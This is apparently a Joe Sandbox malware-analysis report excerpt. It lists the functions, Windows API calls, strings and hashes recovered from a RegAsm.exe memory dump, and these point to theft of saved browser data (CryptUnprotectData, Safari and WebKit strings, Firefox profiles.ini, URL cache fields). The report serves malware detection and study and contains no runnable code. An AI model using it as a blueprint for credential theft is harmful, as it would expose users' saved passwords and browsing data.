LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775

Strings

8, xrefs: 004024B5
`, xrefs: 004024BA
server, xrefs: 00402290
!, xrefs: 0040252F
}, xrefs: 0040237B
F, xrefs: 00402407
n, xrefs: 0040255F
t, xrefs: 00402647
\, xrefs: 00402517
=, xrefs: 00402527
~, xrefs: 0040258F
t, xrefs: 00402537
X, xrefs: 0040262F
&, xrefs: 00402399
@, xrefs: 0040253F
^, xrefs: 00402627
I, xrefs: 0040243E
q, xrefs: 004024C4
A, xrefs: 004023DF
g, xrefs: 004023A3
com.apple.Safari, xrefs: 00402664
t, xrefs: 0040261F
Account, xrefs: 004022FA
y, xrefs: 00402492
&, xrefs: 004025E7
com.apple.WebKit2WebProcess, xrefs: 0040268C
#, xrefs: 004025EF
y, xrefs: 004023CB
', xrefs: 0040242A
K, xrefs: 00402547
H, xrefs: 00402376
S, xrefs: 004024E1
0, xrefs: 00402451
Path, xrefs: 004022CC
/, xrefs: 004024EB
n, xrefs: 004025A7
h, xrefs: 004024CE
>, xrefs: 00402371
L, xrefs: 0040260F
u, xrefs: 0040242F
>, xrefs: 00402380
Data, xrefs: 00402328
K, xrefs: 00402402
H, xrefs: 0040236C
2, xrefs: 00402597
), xrefs: 004025C7
w, xrefs: 004024E6
b, xrefs: 0040238A
z, xrefs: 0040256F
$, xrefs: 004025B7
a, xrefs: 004024F5
u, xrefs: 0040247E
{, xrefs: 004023EE
O, xrefs: 004023D5

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 2257402768-1134094380
Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767

Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040C899
_wcsicmp.MSVCRT ref: 0040C8B4
_wcsnicmp.MSVCRT ref: 0040C8CE
_wcsnicmp.MSVCRT ref: 0040C8E2
wcslen.MSVCRT ref: 0040C8F3
_wcsicmp.MSVCRT ref: 0040C915
memset.MSVCRT ref: 0040C95A
wcscpy.MSVCRT ref: 0040C967
wcslen.MSVCRT ref: 0040C988
wcslen.MSVCRT ref: 0040C9A0
_wcsicmp.MSVCRT ref: 0040C9EB
_wcsicmp.MSVCRT ref: 0040CA04
_wcsnicmp.MSVCRT ref: 0040CA1B
memset.MSVCRT ref: 0040CA61
wcschr.MSVCRT ref: 0040CA69
wcslen.MSVCRT ref: 0040CA71
wcscpy.MSVCRT ref: 0040CA8F
wcschr.MSVCRT ref: 0040CA9D
_wcsnicmp.MSVCRT ref: 0040CAD3
memset.MSVCRT ref: 0040CB07
strlen.MSVCRT ref: 0040CB0D
memcpy.MSVCRT ref: 0040CB29
strchr.MSVCRT ref: 0040CB3E
memset.MSVCRT ref: 0040CB68
memset.MSVCRT ref: 0040CB7D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040CB9E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040CBB1

Strings

https://, xrefs: 0040C8DC
ftp://, xrefs: 0040CA15
http://, xrefs: 0040C8C8
:stringdata, xrefs: 0040C90F

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
String ID: :stringdata$ftp://$http://$https://
API String ID: 2787044678-1921111777
Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9

Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0041402F
GetDlgItem.USER32(?,000003E8), ref: 0041403B
GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
GetWindowLongW.USER32(?,000000F0), ref: 00414056
GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
GetWindowLongW.USER32(?,000000EC), ref: 0041406B
GetWindowRect.USER32(00000000,?), ref: 0041407D
GetWindowRect.USER32(?,?), ref: 00414088
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
GetDC.USER32 ref: 004140E3
wcslen.MSVCRT ref: 00414123
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
ReleaseDC.USER32(?,?), ref: 00414181
_snwprintf.MSVCRT ref: 00414244
SetWindowTextW.USER32(?,?), ref: 00414258
SetWindowTextW.USER32(?,00000000), ref: 00414276
GetDlgItem.USER32(?,00000001), ref: 004142AC
GetWindowRect.USER32(00000000,?), ref: 004142BC
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
GetClientRect.USER32(?,?), ref: 004142E1
GetWindowRect.USER32(?,?), ref: 004142EB
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
GetClientRect.USER32(?,?), ref: 0041433B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373

Strings

EDIT, xrefs: 00414219
STATIC, xrefs: 004141E3
%s:, xrefs: 00414239

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16

Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00413221
GetDlgItem.USER32(?,000003EA), ref: 00413239
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
memset.MSVCRT ref: 00413292
memset.MSVCRT ref: 004132B4
memset.MSVCRT ref: 004132CD
memset.MSVCRT ref: 004132E1
memset.MSVCRT ref: 004132FB
memset.MSVCRT ref: 00413310
GetCurrentProcess.KERNEL32 ref: 00413318
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
memset.MSVCRT ref: 004133C0
GetCurrentProcessId.KERNEL32 ref: 004133CE
memcpy.MSVCRT ref: 004133FC
wcscpy.MSVCRT ref: 0041341F
_snwprintf.MSVCRT ref: 0041348E
SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
GetDlgItem.USER32(?,000003EA), ref: 004134B0
SetFocus.USER32(00000000), ref: 004134B7

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
{Unknown}, xrefs: 004132A6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69

Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003EC), ref: 004011F0
ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
GetDlgItem.USER32(?,000003EE), ref: 00401238
ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
GetDlgItem.USER32(?,000003EC), ref: 00401273
ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
LoadCursorW.USER32(00000000,00000067), ref: 00401297
SetCursor.USER32(00000000), ref: 0040129E
GetDlgItem.USER32(?,000003EE), ref: 004012BF
ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
GetDlgItem.USER32(?,000003EC), ref: 004012E6
SetBkMode.GDI32(?,00000001), ref: 004012F2
SetTextColor.GDI32(?,00C00000), ref: 00401300
GetSysColorBrush.USER32(0000000F), ref: 00401308
GetDlgItem.USER32(?,000003EE), ref: 00401329
EndDialog.USER32(?,?), ref: 0040135E
DeleteObject.GDI32(?), ref: 0040136A
GetDlgItem.USER32(?,000003ED), ref: 0040138F
ShowWindow.USER32(00000000), ref: 00401398
GetDlgItem.USER32(?,000003EE), ref: 004013A4
ShowWindow.USER32(00000000), ref: 004013A7
SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
SetWindowTextW.USER32(?,00000000), ref: 004013CA
SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID:
API String ID: 829165378-0
Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19

Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404172

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

wcscpy.MSVCRT ref: 004041D6
wcscpy.MSVCRT ref: 004041E7
memset.MSVCRT ref: 00404200
memset.MSVCRT ref: 00404215
_snwprintf.MSVCRT ref: 0040422F
wcscpy.MSVCRT ref: 00404242
memset.MSVCRT ref: 0040426E
memset.MSVCRT ref: 004042CD
memset.MSVCRT ref: 004042E2
_snwprintf.MSVCRT ref: 004042FE
wcscpy.MSVCRT ref: 00404311

Strings

IsRelative, xrefs: 00404341
Profile%d, xrefs: 0040421B, 004042F0
General, xrefs: 004041E1
profiles.ini, xrefs: 0040417D
AE, xrefs: 0040432B, 0040433B, 00404346
EA, xrefs: 004041B8
Path, xrefs: 00404326

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
API String ID: 2454223109-1580313836
Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA

Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F

SetMenu.USER32(?,00000000), ref: 00411453
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
GetModuleHandleW.KERNEL32(00000000), ref: 00411495
LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
memcpy.MSVCRT ref: 004115C8
ShowWindow.USER32(?,?), ref: 004115FE
GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7

Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3

Strings

report.html, xrefs: 0041164A
xE, xrefs: 00411622
/nosaveload, xrefs: 00411585
SysListView32, xrefs: 004114FA
commdlg_FindReplace, xrefs: 00411675

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
API String ID: 4054529287-3175352466
Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65

Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004101C0
memset.MSVCRT ref: 004101D5
memset.MSVCRT ref: 004101EA
_snwprintf.MSVCRT ref: 00410219
_snwprintf.MSVCRT ref: 00410248
wcscpy.MSVCRT ref: 00410259
_snwprintf.MSVCRT ref: 00410279
memset.MSVCRT ref: 004102B8
_snwprintf.MSVCRT ref: 004102D9
_snwprintf.MSVCRT ref: 00410313

Part of subcall function 00414E4E: _snwprintf.MSVCRT ref: 00414E72

Strings

bgcolor="%s", xrefs: 00410208
<th%s>%s%s%s, xrefs: 00410302
<table border="1" cellpadding="5"><tr%s>, xrefs: 00410268
width="%s", xrefs: 004102C8
</font>, xrefs: 00410253
<font color="%s">, xrefs: 00410237

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66

Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999

GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
LoadIconW.USER32(00000000,00000072), ref: 004035CA
GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
LoadIconW.USER32(00000000,00000074), ref: 004035E4
GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
LoadIconW.USER32(00000000,00000073), ref: 004035F8
GetModuleHandleW.KERNEL32(00000000), ref: 00403607
LoadIconW.USER32(00000000,00000075), ref: 0040360C
GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
LoadIconW.USER32(00000000,0000006F), ref: 00403620
GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
LoadIconW.USER32(00000000,00000076), ref: 00403634
GetModuleHandleW.KERNEL32(00000000), ref: 00403643
LoadIconW.USER32(00000000,00000077), ref: 00403648
GetModuleHandleW.KERNEL32(00000000), ref: 00403657
LoadIconW.USER32(00000000,00000070), ref: 0040365C
GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
LoadIconW.USER32(00000000,00000078), ref: 00403670

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 1043902810-0
Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929

Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1

Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B

??3@YAXPAX@Z.MSVCRT ref: 0040E49A

Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69

memset.MSVCRT ref: 0040E380

Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B

wcschr.MSVCRT ref: 0040E3B8
memcpy.MSVCRT ref: 0040E3EC
memcpy.MSVCRT ref: 0040E407
memcpy.MSVCRT ref: 0040E422
memcpy.MSVCRT ref: 0040E43D

Strings

, xrefs: 0040E2DD
ExpiryTime, xrefs: 0040E336
AccessedTime, xrefs: 0040E343
AccessCount, xrefs: 0040E31C
EntryID, xrefs: 0040E36A
Url, xrefs: 0040E35D
CreationTime, xrefs: 0040E329
ModifiedTime, xrefs: 0040E350

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
API String ID: 3073804840-2252543386
Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0044480A
_snwprintf.MSVCRT ref: 0044488A
wcscpy.MSVCRT ref: 004448B4
??3@YAXPAX@Z.MSVCRT ref: 00444964

Strings

\VarFileInfo\Translation, xrefs: 00444864
040904E4, xrefs: 004448AE
ProductName, xrefs: 004448BB
%4.4X%4.4X, xrefs: 0044487F
OriginalFileName, xrefs: 0044494B
LegalCopyright, xrefs: 00444936
ProductVersion, xrefs: 004448F7
InternalName, xrefs: 00444921
CompanyName, xrefs: 0044490C
FileDescription, xrefs: 004448CD
FileVersion, xrefs: 004448E2

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@??3@_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 2899246560-1542517562
Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8

Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004091E2

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

memcpy.MSVCRT ref: 004092C9
memcmp.MSVCRT ref: 004092D9
memcpy.MSVCRT ref: 0040930C
memcpy.MSVCRT ref: 00409325
memcmp.MSVCRT ref: 0040933B
memcpy.MSVCRT ref: 00409357
memcpy.MSVCRT ref: 00409370
memcmp.MSVCRT ref: 00409411
memcmp.MSVCRT ref: 00409429
memcpy.MSVCRT ref: 00409462
memcpy.MSVCRT ref: 0040947E
memcpy.MSVCRT ref: 0040949A
memcmp.MSVCRT ref: 004094AC
memcpy.MSVCRT ref: 004094D0
memcpy.MSVCRT ref: 004094E8

Strings

, xrefs: 0040929F

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$memcmp$ByteCharMultiWidememset
String ID:
API String ID: 3715365532-3916222277
Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
??2@YAPAXI@Z.MSVCRT ref: 0040859D

Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306

memset.MSVCRT ref: 004085CF
memset.MSVCRT ref: 004085F1
memset.MSVCRT ref: 00408606
strcmp.MSVCRT ref: 00408645
_mbscpy.MSVCRT ref: 004086DB
_mbscpy.MSVCRT ref: 004086FA
memset.MSVCRT ref: 0040870E
strcmp.MSVCRT ref: 0040876B
??3@YAXPAX@Z.MSVCRT ref: 0040879D
CloseHandle.KERNEL32(?), ref: 004087A6

Strings

---, xrefs: 00408765

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3437578500-2854292027
Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9

Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
malloc.MSVCRT ref: 004186B7
??3@YAXPAX@Z.MSVCRT ref: 004186C7
GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
??3@YAXPAX@Z.MSVCRT ref: 004186E0
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
malloc.MSVCRT ref: 004186FE
GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
??3@YAXPAX@Z.MSVCRT ref: 00418716
??3@YAXPAX@Z.MSVCRT ref: 0041872A
??3@YAXPAX@Z.MSVCRT ref: 00418749

Strings

|A, xrefs: 00418680

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@$FullNamePath$malloc$Version
String ID: |A
